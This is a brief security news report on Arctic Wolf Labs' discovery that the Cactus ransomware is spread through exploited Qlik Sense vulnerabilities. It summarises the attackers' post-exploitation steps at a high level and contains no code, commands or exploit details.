The Cactus ransomware is actively spread via the cloud analytics and BI platform Qlik Sense. Arctic Wolf Labs’ security specialists recently discovered this.
According to Arctic Wolf, this is the first time that vulnerabilities in Qlik Sense have been exploited to gain access to systems to spread the Cactus ransomware. In this attack, the hackers are exploiting a combination of known vulnerabilities in the cloud analytics and BI platform. Specifically, these are vulnerabilities CVE-2023-41266, CVE-2023-41265 and possibly CVE-2023-48365. These vulnerabilities are exploited for remote code running and, in this case, spreading the Cactus ransomware.
Attack path
Examining what takes place after a successful exploit in Qlik Sense, the security specialists found that hackers then used the Qlik Sense Scheduler service, among other things. In addition, they abused PowerShell and the Background Intelligent Transfer Service (BITS) to download other tooling. With that tooling, they obtained the ability to perform remote monitoring functionality.
Rolling out Cactus ransomware
In addition, suspicious activities were observed that indicated the rollout and exploitation of the Cactus ransomware. These suspicious activities included using RDP for lateral movement, downloading the WizTree disk analyzer and deploying rclone for data exfiltration.
Other malicious actions included deploying ManageEngine UEMS and AnyDesk for remote access, actively uninstalling Sophos software, changing the admin password and setting up an RDP tunnel via Plink.
Arctic Wolf is still busy investigating an incident that occurred with a customer. The security specialist indicated that more details will come out later.
Also read: Ransomware keeps evolving: Cactus strain encrypts itself
18 hours ago
